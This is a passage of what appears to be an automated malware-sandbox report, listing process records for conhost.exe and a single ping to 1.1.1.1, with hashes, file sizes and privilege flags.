                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff704000000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:65
                                                                                                                                                Start time:03:55:28
                                                                                                                                                Start date:16/12/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                Imagebase:0xdd0000
                                                                                                                                                File size:18'944 bytes
                                                                                                                                                MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                No disassembly